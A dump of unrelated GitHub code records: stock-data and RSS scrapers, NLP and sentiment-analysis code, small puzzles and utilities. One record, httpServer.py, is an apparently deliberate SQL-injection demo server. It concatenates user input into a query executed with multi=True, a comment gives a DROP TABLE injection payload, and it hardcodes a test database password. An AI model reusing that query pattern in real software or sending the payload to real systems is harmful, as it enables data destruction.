date\r\n today = pd.Timestamp.today()\r\n\r\n # Get the timestamp of today's beginning\r\n start_ts = int(today.replace(hour=0, minute=0, second=0, microsecond=0).timestamp())\r\n\r\n # Get the timestamp of today's end\r\n end_ts = int(today.replace(hour=23, minute=59, second=59, microsecond=999).timestamp())\r\n\r\n print(\"Start timestamp:\", start_ts)\r\n print(\"End timestamp:\", end_ts)\r\n return start_ts, end_ts\r\n\r\n\r\n# Define URL template\r\nURL = \"https://query1.finance.yahoo.com/v7/finance/download/{0}?period1={1}&period2={2}&interval=1d&events=history\"\r\n\r\nasync def download_stock_data(session: aiohttp.ClientSession, company_code: str, company_name: str, start_date: int, end_date: int) -> pd.DataFrame:\r\n \"\"\"\r\n Asynchronously downloads stock data for a given company_code between start and end dates.\r\n\r\n :param session: aiohttp.ClientSession object for making HTTP requests.\r\n :param company_code: Stock company_code.\r\n :param start_date: Start date as a timestamp.\r\n :param end_date: End date as a timestamp.\r\n :return: DataFrame with stock data.\r\n \"\"\"\r\n url = URL.format(company_code, start_date, end_date)\r\n try:\r\n async with session.get(url) as response:\r\n if response.status == 200:\r\n data = await response.text()\r\n df = pd.read_csv(io.StringIO(data))\r\n df['company_name'] = company_name\r\n df['company_code'] = company_code.split('.NS')[0]\r\n return df\r\n else:\r\n print(f\"Failed to download data for {company_code}. HTTP status: {response.status}\")\r\n return None\r\n except Exception as e:\r\n raise Exception(f\"An error occurred while downloading data for {company_code}: {e}\")\r\n\r\n\r\nasync def download_job(stocks_list: pd.DataFrame) -> pd.DataFrame:\r\n \"\"\"\r\n Main function to download stock data for multiple company_codes.\r\n\r\n :param stocks_list: DataFrame containing stock company_codes.\r\n :param start_date: Start date in 'YYYY-MM-DD' format.\r\n :param end_date: End date in 'YYYY-MM-DD' format.\r\n :return: DataFrame with combined stock data.\r\n \"\"\"\r\n # start_ts = int(pd.to_datetime(start_date).timestamp())\r\n # end_ts = int(pd.to_datetime(end_date).timestamp())\r\n\r\n start_ts, end_ts = get_timestamp_today()\r\n\r\n async with aiohttp.ClientSession() as session:\r\n tasks = [asyncio.create_task(download_stock_data(session, row['company_code'], row['company_name'], start_ts, end_ts)) for _, row in stocks_list.iterrows()]\r\n nifty_data_list = await asyncio.gather(*tasks)\r\n nifty_data_list = [item for item in nifty_data_list if item is not None]\r\n\r\n if len(nifty_data_list) == 0:\r\n raise Exception(\"There is no data\")\r\n \r\n nifty_data_df = pd.concat([item for item in nifty_data_list if item is not None], ignore_index=True, axis=0)\r\n nifty_data_df['Date'] = pd.to_datetime(nifty_data_df['Date'])\r\n nifty_data_df['year'] = nifty_data_df['Date'].dt.year\r\n nifty_data_df['month'] = nifty_data_df['Date'].dt.month\r\n nifty_data_df['day'] = nifty_data_df['Date'].dt.day\r\n\r\n return nifty_data_df\r\n\r\n# Example usage\r\n# stocks_list = pd.DataFrame({\r\n# 'company_code': ['ADANIPORTS.NS', 'BAJAJ-AUTO.NS'],\r\n# 'Company Name': ['Adani Ports', 'Bajaj Auto Ltd.']\r\n# })\r\n# start_date = '2023-01-01'\r\n# end_date = '2023-11-30'\r\n# loop = asyncio.get_event_loop()\r\n# nifty_data_df = loop.run_until_complete(main(stocks_list, start_date, end_date))\r\n","repo_name":"vaibhavmaurya/aimlops-iisc-grp2-jarvis-capstone","sub_path":"DataIngestion/src/Job.py","file_name":"Job.py","file_ext":"py","file_size_in_byte":3728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10461906956","text":"year_born =str(1799)\r\nday_born = str(6)\r\n\r\nyear_input = \"\"\r\nwhile year_input != year_born:\r\n year_input = input(\"В каком году родился А.С. Пушкин? \")\r\n\r\nday_input = \"\"\r\nwhile day_input != day_born:\r\n day_input = input(\"В какой день родился? \")\r\n\r\nprint(\"Верно\")","repo_name":"sakovd/dz2","sub_path":"borndayforewer.py","file_name":"borndayforewer.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10255869007","text":"import http.server\r\nfrom urllib.parse import urlparse\r\nfrom urllib.parse import parse_qs\r\nimport os, sys\r\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\r\nimport socketserver\r\nimport pathlib\r\nimport mysql.connector\r\nimport traceback\r\n\r\nclass serverResponse(BaseHTTPRequestHandler):\r\n\r\n Error_Page = \"\\\r\n \\\r\n \\\r\n

Error accessing {path}

\\\r\n

{msg}

\\\r\n \\\r\n \"\r\n mydb = \"\"\r\n \r\n sql_dynamic_content = [\".\", \".\"]\r\n \r\n try:\r\n mydb = mysql.connector.connect(host=\"localhost\", user=\"httpUser\", password=\"simpleP4ssPhrase4Testing\", database=\"htmlDB\")\r\n print(\"DB htmlDB connected\")\r\n except Exception as excep:\r\n mydb = mysql.connector.connect(host=\"localhost\", user=\"httpUser\", password=\"simpleP4ssPhrase4Testing\")\r\n dbcursor = mydb.cursor()\r\n dbcursor.execute(\"CREATE DATABASE htmlDB\")\r\n print(\"DB htmlDB created\")\r\n \r\n dbcursor = mydb.cursor(buffered=True)\r\n try:\r\n dbcursor.execute(\"CREATE TABLE htmlInput (id INT AUTO_INCREMENT PRIMARY KEY, input TEXT)\")\r\n print(\"Table htmlInput created\")\r\n except mysql.connector.errors.ProgrammingError as pe:\r\n print(\"Table probably already existed\")\r\n except Exception as excep:\r\n traceback.print_exc()\r\n \r\n def do_GET(self):\r\n try:\r\n \r\n currWorkingDir = os.path.abspath(os.getcwd())\r\n #print(\"workingDir: \", currWorkingDir)\r\n #print(self.path)\r\n full_path = os.path.join(currWorkingDir, self.path.replace(\"/\", \"\")) #.replace(\"/\", \"\\\\\")\r\n #print(full_path)\r\n url_comp = urlparse(self.path)\r\n query_comp = parse_qs(urlparse(self.path).query)\r\n \r\n # It doesn't exist...\r\n if not os.path.exists(full_path):\r\n #print(\"received: \", self.path)\r\n #print(\"url_comp: \", url_comp)\r\n #print(\"query_comp: \", query_comp)\r\n if url_comp.path == '/sqlinjection.html':\r\n self.handle_sqlInjection_page(query_comp) \r\n else:\r\n self.handle_file(os.path.join(os.path.abspath(os.getcwd()), \"value.html\"), self.path)\r\n #raise Exception(\"'{0}' not found\".format(self.path))\r\n # ...it's a file...\r\n elif os.path.isfile(full_path):\r\n if url_comp.path == '/sqlinjection.html':\r\n self.handle_file(full_path, [\".\", \".\"])\r\n else:\r\n self.handle_file(full_path)\r\n # ...it's something we don't handle.\r\n else:\r\n if self.path == '/':\r\n self.handle_file(os.path.join(os.path.abspath(os.getcwd()), \"index.html\"), self.path)\r\n else:\r\n raise Exception(\"Unknown object: \"+ full_path)\r\n\r\n # Handle errors.\r\n except Exception as msg:\r\n print(\"Error occured: \\n\", msg)\r\n traceback.print_exc()\r\n self.handle_error(msg)\r\n \r\n # Handle the input from page sqlinjection.html\r\n # Exploit input: '; drop table htmlInput; select * from htmlInput where input = '\r\n def handle_sqlInjection_page (self, query_comp):\r\n if 'sql_insert' in query_comp:\r\n sql = \"INSERT INTO htmlInput (input) VALUES (%s)\"\r\n val = (query_comp['sql_insert'][0],)\r\n self.dbcursor.execute(sql, val)\r\n self.mydb.commit()\r\n self.dbcursor.execute(\"SELECT * FROM htmlInput\")\r\n result = self.dbcursor.fetchall()\r\n self.sql_dynamic_content[0] = result\r\n self.sql_dynamic_content[1] = \".\"\r\n for res in result:\r\n print(\"Result insert: \", res)\r\n else:\r\n sql = \"select * from htmlInput where input = '\" + query_comp['sql'][0] + \"'\"\r\n print(\"Injection String: \", sql)\r\n results = self.dbcursor.execute(sql, multi=True)\r\n result = []\r\n for res in results:\r\n print(\"Executing command: \", res)\r\n if res.with_rows:\r\n result += self.dbcursor.fetchall()\r\n self.mydb.commit()\r\n self.sql_dynamic_content[0] = \".\"\r\n self.sql_dynamic_content[1] = result\r\n \r\n self.handle_file(os.path.join(os.path.abspath(os.getcwd()), \"sqlinjection.html\"), self.sql_dynamic_content)\r\n \r\n \r\n # Handle unknown objects.\r\n def handle_error(self, msg):\r\n content = self.Error_Page.format(path=self.path, msg=msg).encode(\"utf-8\")\r\n self.send_content(content, 404)\r\n\r\n # Send actual content.\r\n def send_content(self, content, status=200):\r\n self.send_response(status)\r\n self.send_header(\"Content-type\", \"text/html\")\r\n self.send_header(\"Content-Length\", str(len(content)))\r\n self.end_headers()\r\n self.wfile.write(content)\r\n \r\n # Prepare content to be sent \r\n def handle_file(self, full_path, value=\".\"):\r\n try:\r\n with open(full_path, 'rb') as reader:\r\n content = reader.read()\r\n if not \".js\" in self.path:\r\n content = content.decode(\"utf-8\").format(*value)\r\n content = content.encode(\"utf-8\")\r\n self.send_content(content)\r\n except IOError as msg:\r\n msg = \"'{0}' cannot be read: {1}\".format(self.path, msg)\r\n self.handle_error(msg)\r\n \r\nif __name__ == \"__main__\": \r\n httpd = socketserver.TCPServer((\"\", 8000), serverResponse)\r\n print(\"Server started!\")\r\n print(\"serving at port:\", 8000)\r\n httpd.serve_forever()\r\n \r\n print(\"Server ende\")","repo_name":"SteNu5/ServerBenchmarkTest","sub_path":"ServerBenchmarkTest/httpServer.py","file_name":"httpServer.py","file_ext":"py","file_size_in_byte":5782,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14423445568","text":"def swap(s,n):\n # Провека исключения\n if n == 0:\n return ('the lord of the rings')\n # Преобразование в двоичную систему счисления\n n1, s1, n2, j = '', '', '', 0\n while n != 0:\n n1 += str(n % 2)\n n = n // 2\n n1 = n1[::-1]\n # Создание строки битов такого же размера, как и нашего текстового сообщения\n for i in range(len(s)):\n if s[i] != ' ' and (s[i] not in '!?.,@#$%^&*():;\"\"'):\n n2 += n1[(i - j) % (len(n1))] \n else:\n n2 += ' '\n j += 1 \n # Алгоритм изменения символов если соответствует \"1\"\n for i in range(len(s)):\n if n2[i] == ' ':\n s1 += s[i]\n elif n2[i] == '0':\n s1 += s[i]\n elif n2[i] == '1':\n if s[i] == s[i].upper():\n s1 += s[i].lower()\n else:\n s1 += s[i].upper()\n return(s1)\n","repo_name":"DenisRudakov0/Algorithm","sub_path":"2 Swap Case Using N.py","file_name":"2 Swap Case Using N.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17519339541","text":"class PipelineCommon:\n \"\"\"The common pipeline of several processors.\n \n The pipeline provides an ablity to specify its structure in a declarative way. It requires that all \n its processors are callable (implement __call__ method). The pipeline can contain processors, \n remote gRPC processors, or other pipelines. During processing the pipeline stores the results in a dictionary. If\n processor returns None, results are ommited.\n Args:\n processors(list or dict): A list or a dictionary ({ : }) that contains tripples: \n (, , ).\n Dictionary of output annotations should specify name/ordianl number of annotation in dictioanry/tuple \n returned from processor. This is needed for storing the result annotation in an internal dictionary.\n If name or number is ommited then result will not be stored in a piplene and will be dropped from further\n processing.\n name(str): The name of the pipeline. It is used for automatic pipeline naming in a gRPC server container.\n \n Examples:\n 1.\n PipelineCommon([(ProcessorTokenizerNltkEn(), ['text'], {0 : 'tokens'}),\n (ProcessorSentenceSplitter(), ['tokens'], {0 : 'sentences'}),\n (ProcessorPostaggerNltkEn(), ['tokens', 'sentences'], {0 : 'postag'}),\n (ProcessorLemmatizerNltkEn(), ['tokens', 'sentences', 'postag'], {0 : 'lemma'})])\n \n 2.\n PipelineCommon([(ProcessorRemote(host = 'some_host', port = 3333, pipeline_name = 'main'), \n ['text'], \n {'tokens' : 'tokens', \n 'sentences' : 'sentences',\n 'postags' : 'postags',\n 'morph' : 'morph'}),\n (ProcessorSyntaxNetRemote('some_host', 7777),\n ['tokens', 'sentences'],\n {'syntax_dep_tree' : 'syntax_dep_tree',\n 'morph' : 'morph'})])\n \n 3. \n PipelineCommon({'tokenizer' : (ProcessorTokenizerNltkEn(), \n ['text'], \n {0 : 'tokens'}),\n 'sentence_splitter' : (ProcessorSentenceSplitter(), \n ['tokens'], \n {0 : 'sentences'}),\n 'postagger' : (ProcessorPostaggerNltkEn(), \n ['tokens', 'sentences'], \n {0 : 'postag'}),\n 'lemmatizer' : (ProcessorLemmatizerNltkEn(), \n ['tokens', 'sentences', 'postag'], \n {0 : 'lemma'})}, \n name = 'main')\n \n 4. \n PipelineCommon([(ProcessorTokenizerNltkEn(), ['text'], {'tokens' : 'tokens'}),\n (ProcessorSentenceSplitter(), ['tokens'], {'sentences' : 'sentences'}),\n (ProcessorPostaggerNltkEn(), ['sentences'], {'postag' : 'postag'}),\n (WrapperMultiProcessSentence([ProcessorPostaggerNltkEn() for i in range(4)]), \n ['sentences'], {'postag' : 'postag'}),\n (WrapperMultiProcessSentence([ProcessorLemmatizerNltkEn() for i in range(4)]), \n ['sentences', 'postag'], {'lemma' : 'lemma'}),\n (ProcessorSyntaxNetRemote('some_host', 8555), ['sentences'], \n {'morph' : 'morph', 'syn_dep_tree' : 'syn_dep_tree'})])\n \"\"\"\n \n def __init__(self, processors, name = 'main'):\n self._name = name\n if type(processors) is dict:\n self._processors = processors\n else:\n self._processors = {str(i) : processors[i] for i in range(len(processors))}\n \n def __call__(self, *input_data): \n result = {e : inp for (e, inp) in zip(list(self._processors.values())[0][1], input_data)}\n \n for proc, proc_input, proc_output in list(self._processors.values()):\n results = proc(*[result[e] for e in proc_input])\n if type(results) is tuple:\n results = {i : results[i] for i in range(len(results))}\n elif type(results) is not dict:\n results = {0 : results}\n \n result.update({ppl_label : results[proc_label] \n for (proc_label, ppl_label) in proc_output.items() \n if ppl_label})\n \n keys_to_delete = [k for (k,v) in result.items() if v is None]\n for k in keys_to_delete:\n del result[k]\n \n return result\n\n def get_processors(self):\n return self._processors\n\n def processors_iter(self):\n for proc_stuff in self._processors.values():\n proc = proc_stuff[0]\n if hasattr(proc, 'processors_iter'):\n yield from proc.processors_iter()\n else:\n yield proc\n","repo_name":"IINemo/isanlp","sub_path":"src/isanlp/pipeline_common.py","file_name":"pipeline_common.py","file_ext":"py","file_size_in_byte":5334,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"67"} +{"seq_id":"23770299676","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport pandas as pd\r\n\r\n\r\ndef get_df_RSS():\r\n feeds = ['https://smartliquidity.info/feed/', 'https://finance.yahoo.com/news/rssindex',\r\n 'https://blog.buyucoin.com/feed/', 'https://cointelegraph.com/rss/tag/altcoin',\r\n 'https://cryptopotato.com/feed/', 'https://cointelegraph.com/rss/category/top-10-cryptocurrencies',\r\n 'https://cointelegraph.com/rss/tag/regulation', 'https://cointelegraph.com/rss',\r\n 'https://www.coindesk.com/arc/outboundfeeds/rss/?outputType=xml',\r\n 'https://u.today/rss', 'https://coinpedia.org/feed/']\r\n output = []\r\n\r\n for url in feeds:\r\n resp = requests.get(url)\r\n soup = BeautifulSoup(resp.text, 'xml')\r\n\r\n for entry in soup.find_all('item'):\r\n item = {'Title': entry.find('title').text, 'Link': entry.find('link').text}\r\n output.append(item)\r\n\r\n df = pd.DataFrame(output)\r\n print(df)\r\n return df\r\n","repo_name":"ArtemiyM1/crypto_forecast_system","sub_path":"RSS_feed.py","file_name":"RSS_feed.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"10043530","text":"#!/usr/bin/env python\n\nimport argparse\nimport re\nimport sys\n\n\ndef polish_monocharacters(text):\n phase1 = re.sub(r\"\\b([iwzoua]) (\\w|\\(|\\\\)\", r\"\\1~\\2\", text, flags=re.IGNORECASE)\n phase2 = re.sub(r\"~([iwzoua]) (\\w|\\(|\\\\)\", r\"~\\1~\\2\", phase1)\n return phase2\n\n\ndef _main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"files\", nargs=\"*\")\n parser.add_argument(\"--inplace\", \"-w\", action=\"store_true\")\n parser.add_argument(\n \"--nbsp\", \"-s\", action=\"store_true\", help=\"use Unicode A0, not ~\"\n )\n args = parser.parse_args()\n\n if not args.files:\n data = sys.stdin.read()\n result = polish_monocharacters(data)\n sys.stdout.write(result)\n\n for filename in args.files:\n with open(filename) as f:\n data = f.read()\n\n result = polish_monocharacters(data)\n\n if args.nbsp:\n result = result.replace('~', '\\xA0')\n\n if args.inplace:\n with open(filename, \"w\") as f:\n f.write(result)\n else:\n sys.stdout.write(result)\n\n\nif __name__ == \"__main__\":\n _main()\n","repo_name":"tgandor/meats","sub_path":"DTP/polish_monocharacters.py","file_name":"polish_monocharacters.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"67"} +{"seq_id":"33200632737","text":"\n\nn ,m = map(int,(input().split()))\ncards={}\ncardsL=[]\nans={}\nfor i in range(n):\n card=input()\n cards[card]=i\n cardsL.append(card)\n\ndef getCard3(A,B,m):\n card3=\"\"\n for i in range(m):\n if A[i]==B[i]:\n card3+=A[i]\n elif A[i]!=\"T\" and B[i]!=\"T\":\n card3+=\"T\"\n elif A[i]!=\"E\" and B[i]!=\"E\":\n card3+=\"E\"\n elif A[i]!=\"S\" and B[i]!=\"S\":\n card3+=\"S\"\n return card3\nres=0\nfor i in range(n-1):\n for j in range(i+1,n-1):\n CardT=getCard3(cardsL[i],cardsL[j],m)\n temp=cards.get(CardT,0)\n if temp>j:\n res+=1 \nprint(res)\n\n\n\n","repo_name":"marcus-aurelianus/codeforce","sub_path":"Round612/hyperset.py","file_name":"hyperset.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"43727425816","text":"from os import path\nimport numpy as np\n\n\nclass Oracle:\n def __init__(self, work_dir: str):\n self.work_dir = work_dir\n self.states = []\n self.rewards = []\n\n def load_history(self, file_name: str):\n with open(path.join(self.work_dir, file_name)) as f:\n lines = f.readlines()\n for line in lines:\n line = line.strip().split(',')\n start_state = [float(s) for s in np.array(line[:-1])]\n reward = int(line[-1])\n self.states.append(start_state)\n self.rewards.append(reward)\n\n def total_reward(self) -> int:\n return sum(self.rewards)\n\n def get_reward(self, state: np.ndarray) -> float:\n i = self.states.index(state)\n return self.rewards[i]\n\n def avg_reward(self) -> float:\n return self.total_reward() / len(self.states)\n\n\n\nif __name__ == '__main__':\n work_dir = '/Users/ironchefnate/iCloud/Documents/USC/CSCI_699_HRI/project/code/robolog/boost/oracles/sarsa/agent-00'\n history = 'state_rewards.csv'\n O = Oracle(work_dir)\n O.load_history(history)\n print(O.total_reward())\n print(O.states[0])\n","repo_name":"natesands/boosted-RL","sub_path":"forest/oracle.py","file_name":"oracle.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"73239996372","text":"class Solution:\n def accountsMerge(self, accounts: List[List[str]]) -> List[List[str]]:\n\n father ={}\n rootmailToName = {}\n merge_MailList = collections.defaultdict(list)\n result = []\n\n def find(x):\n if x != father[x]:\n father[x] = find(father[x])\n x = father[x]\n return x\n\n def union(x1, x2):\n root1 = find(x1)\n root2 = find(x2)\n if root1 != root2:\n if root1 > root2:\n father[root1] = root2\n elif root1 < root2:\n father[root2] = root1\n\n # Build relations of all the mail\n for account in accounts:\n # creat first mail\n lead_mail = account[1]\n if lead_mail not in father:\n father[lead_mail] = lead_mail\n\n for mail in account[2:]:\n if mail not in father:\n father[mail] = mail\n union(lead_mail, mail)\n\n # connect root mail and name\n for account in accounts:\n name = account[0]\n rootmail = find(account[1])\n if rootmail not in rootmailToName:\n rootmailToName[rootmail] = name\n\n # merge the same root mails into a group\n for mail in father:\n rootmail = find(mail)\n merge_MailList[rootmail].append(mail)\n\n # connect name and mailing group\n for rootmail in rootmailToName:\n step_result = []\n name = rootmailToName[rootmail]\n step_result.append(name)\n step_result.extend(sorted(merge_MailList[rootmail]))\n\n result.append(step_result)\n \n return result\n","repo_name":"Tomatolism/Leetcode","sub_path":"Python/0721AccountsMerge/0721AccountsMerge.py","file_name":"0721AccountsMerge.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"8250740174","text":"import torch\nimport torch.nn as nn\nimport torch.utils.data\n\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import accuracy_score, f1_score, confusion_matrix\n\nfrom data import NLPDataset, pad_collate, embedding_matrix\n\n# paths to datasets\nTRAIN_PATH = 'data/sst_train_raw.csv'\nVALID_PATH = 'data/sst_valid_raw.csv'\nTEST_PATH = 'data/sst_test_raw.csv'\nEMB_PATH = 'data/sst_glove_6b_300d.txt'\n\n\ndef prepare_data(batch_sizes=(10, 32, 32), freeze=True):\n \"\"\"\n Prepares SST data.\n\n :param batch_sizes: the batch sizes for train, valid, and test sets\n :param freeze: the embeddings won't be updated during training if True\n :return: train, valid, and test DataLoaders; and the embeddings\n \"\"\"\n train_dataset = NLPDataset.from_csv(TRAIN_PATH)\n text_vocab, label_vocab = train_dataset.text_vocab, train_dataset.label_vocab\n embeddings = embedding_matrix(text_vocab, 300, freeze, EMB_PATH)\n\n train_dataloader = torch.utils.data.DataLoader(\n dataset=train_dataset, batch_size=batch_sizes[0],\n shuffle=True, collate_fn=pad_collate)\n valid_dataloader = torch.utils.data.DataLoader(\n dataset=NLPDataset.from_csv(VALID_PATH, text_vocab, label_vocab),\n batch_size=batch_sizes[1], shuffle=True, collate_fn=pad_collate)\n test_dataloader = torch.utils.data.DataLoader(\n dataset=NLPDataset.from_csv(TEST_PATH, text_vocab, label_vocab),\n batch_size=batch_sizes[2], shuffle=True, collate_fn=pad_collate)\n\n return train_dataloader, valid_dataloader, test_dataloader, embeddings\n\n\ndef train(dataloader, model, loss_fn, optimizer, clip=None):\n \"\"\"Performs one train loop iteration.\"\"\"\n size = len(dataloader.dataset)\n total_loss = 0\n\n for batch_num, (X, y, _) in enumerate(dataloader):\n # compute prediction and loss\n output = model(X)\n loss = loss_fn(torch.squeeze(output), y)\n total_loss += loss\n\n # backpropagation\n optimizer.zero_grad()\n loss.backward()\n # gradient clipping (optional)\n if clip:\n nn.utils.clip_grad_norm_(model.parameters(), clip)\n optimizer.step()\n\n if batch_num % 100 == 0:\n loss, current = loss.item(), batch_num * X.shape[1]\n print(f'loss: {loss:>7f} [{current:>5d}/{size:>5d}]')\n\n return total_loss / size\n\n\ndef evaluate(dataloader, model, loss_fn):\n \"\"\"Performs one test loop iteration.\"\"\"\n y_true, y_pred = [], []\n loss = 0\n\n with torch.no_grad():\n for X, y, _ in dataloader:\n output = torch.squeeze(model(X))\n loss += loss_fn(output, y).item()\n\n pred = torch.sigmoid(output).round()\n y_true.extend(y.detach().cpu().numpy())\n y_pred.extend(pred.detach().cpu().numpy())\n\n loss /= len(dataloader.dataset)\n acc = accuracy_score(y_true, y_pred)\n\n print(f'Accuracy: {(100 * acc):>0.1f}%\\n'\n f'F1 score: {f1_score(y_true, y_pred):>8f}\\n'\n f'Avg loss: {loss:>8f}\\n'\n f'Confusion matrix:\\n{confusion_matrix(y_true, y_pred)}\\n')\n\n return loss, acc\n\n\ndef plot_performance(train_losses, valid_losses, valid_accs, epochs):\n \"\"\"\n Plots validation set loss and accuracy per epoch.\n\n :param train_losses: the training set losses per epoch\n :param valid_losses: the validation set losses per epoch\n :param valid_accs: the validation set accuracies per epoch\n :param epochs: the number of epochs\n \"\"\"\n fig, (ax1, ax2) = plt.subplots(1, 2)\n fig.subplots_adjust(wspace=0.4)\n\n ax1.plot(range(1, epochs + 1), train_losses, label='train')\n ax1.plot(range(1, epochs + 1), valid_losses, label='valid')\n ax1.set_title('train and valid loss per epoch')\n ax1.set_ylabel('loss')\n ax1.set_xlabel('epoch')\n ax1.legend()\n\n ax2.plot(range(1, epochs + 1), valid_accs, label='valid')\n ax2.set_title('valid accuracy per epoch')\n ax2.set_ylabel('accuracy')\n ax2.set_xlabel('epoch')\n\n plt.show()\n\n\ndef main(model, optimizer, train_dataloader, valid_dataloader,\n test_dataloader, epochs=5, clip=None):\n \"\"\"\n Performs SST sentiment analysis using the given model.\n\n :param model: the model for sentiment analysis\n :param optimizer: the optimizer to use\n :param train_dataloader: training set DataLoader\n :param valid_dataloader: training set DataLoader\n :param test_dataloader: training set DataLoader\n :param epochs: the number of epochs\n :param clip: max gradient norm for gradient clipping\n \"\"\"\n loss_fn = nn.BCEWithLogitsLoss()\n train_losses, valid_losses, valid_accs = [], [], []\n\n for epoch in range(epochs):\n print(f'Epoch {epoch}\\n-------------------------------')\n loss = train(train_dataloader, model, loss_fn, optimizer, clip)\n train_losses.append(loss)\n\n print('Validation set performance')\n loss, acc = evaluate(valid_dataloader, model, loss_fn)\n valid_losses.append(loss)\n valid_accs.append(acc)\n\n plot_performance(train_losses, valid_losses, valid_accs, epochs)\n\n print(f'Test set performance\\n-------------------------------')\n evaluate(test_dataloader, model, loss_fn)\n","repo_name":"yetra/dl-fer-20-21","sub_path":"lab03/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"38418990643","text":"from DemoDog import views\nfrom django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'DemoDog.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n#enter_article\n url(r'^$', views.index),\n url(r'^enter_article', views.enter_article),\n url(r'^accounts/login', views.login),\n url(r'^accounts/logout', views.logout),\n url(r'^accounts/auth', views.authfunc),\n url(r'^accounts/logged_in', views.logged_in),\n url(r'^accounts/invalid', views.invalid_login),\n url(r'^admin/', include(admin.site.urls)),\n)\n","repo_name":"knitinr/DemoDog","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"38715474372","text":"\"\"\"\nProblem:\n\nYou are the technical director of WSPT radio, serving listeners nationwide. For\nsimplicity's sake we can consider each listener to live along a horizontal line\nstretching from 0 (west) to 1000 (east).\n\nGiven a list of N listeners, and a list of M radio towers, each placed at various\nlocations along this line, determine what the minimum broadcast range would have to be\nin order for each listener's home to be covered.\n\nFor example, suppose listeners = [1, 5, 11, 20], and towers = [4, 8, 15]. In this case\nthe minimum range would be 5, since that would be required for the tower at position 15\nto reach the listener at position 20.\n\"\"\"\n\nfrom sys import maxsize\nfrom typing import List\n\n\ndef get_min_range(listeners: List[int], towers: List[int]) -> int:\n # distance map storing the distance of listener from the nearest tower\n listeners_distance = {listener: maxsize for listener in listeners}\n for listener in listeners:\n for tower in towers:\n listeners_distance[listener] = min(\n listeners_distance[listener], abs(tower - listener)\n )\n return max(listeners_distance.values())\n\n\nif __name__ == \"__main__\":\n print(get_min_range([1, 5, 11, 20], [4, 8, 15]))\n\n\n\"\"\"\nSPECS:\n\nTIME COMPLEXITY: O(listeners x towers)\nSPACE COMPLEXITY: O(listeners)\n\"\"\"\n","repo_name":"ruppysuppy/Daily-Coding-Problem-Solutions","sub_path":"Solutions/314.py","file_name":"314.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":444,"dataset":"github-code","pt":"67"} +{"seq_id":"39770118389","text":"def add(matrixA, matrixB):\n result = []\n for i in range(len(matrixA)):\n row = []\n for j in range(len(matrixA[0])):\n row.append(matrixA[i][j] + matrixB[i][j])\n result.append(row)\n return result\n\ndef subtract(matrixA, matrixB):\n r = range(len(matrixA))\n result = matrixA.copy()\n for i in r:\n for j in r:\n result[i][j] -= matrixB[i][j]\n return result\n \na = [\n [2, 3], \n [4, 5]\n ]\nb = [\n [4, 6],\n [8, 2]\n ]\n\ndef getColumn(matrix, i):\n column = []\n for j in range(len(matrix)):\n column.append(matrix[j][i])\n\n return column\n\nprint('A + B = ', add(a, b))\nprint('A - B = ', subtract(a, b))","repo_name":"rxona/pbo-quiz-3","sub_path":"q4.py","file_name":"q4.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"15872110042","text":"from __future__ import absolute_import\nfrom apartment import *\nimport scrapy\nfrom scrapy.crawler import CrawlerProcess\nimport urllib.parse\nimport logging\n\nclass Restaurant(scrapy.Spider):\n name = 'tenedor'\n allowed_domains = ['www.eltenedor.es']\n start_urls = ['https://www.eltenedor.es/']\n logging.getLogger('scrapy').propagate = False # No mostrar log de scrapy\n\n def setData(self, pApartamento = Apartment):\n self.__apartamento = pApartamento\n \n self.__strUrl = 'https://www.eltenedor.es/busqueda/?searchText=' + self.__apartamento.nombreCiudad() + ', ' + self.__apartamento.nombrePais() + '&locality=' + self.__apartamento.nombreCiudad() + '&coordinate=' + self.__apartamento.latitud() + ',' + self.__apartamento.longitud()\n #self.__strUrl = urllib.parse.quote(self.__strUrl)\n self.start_urls.append(self.__strUrl)\n \n def empieza(self):\n process = CrawlerProcess({\n 'USER_AGENT': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)',\n 'DOWNLOAD_DELAY': 0.25,\n 'COOKIES_ENABLED': 'False'\n })\n\n #process = CrawlerProcess({\n # 'USER_AGENT': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36',\n # 'DOWNLOAD_DELAY': 0.25,\n # 'COOKIES_ENABLED': 'False'\n #})\n\n process.crawl(Restaurant)\n process.start()\n \n def parse(self, response):\n if response.url == 'https://www.eltenedor.es/':\n 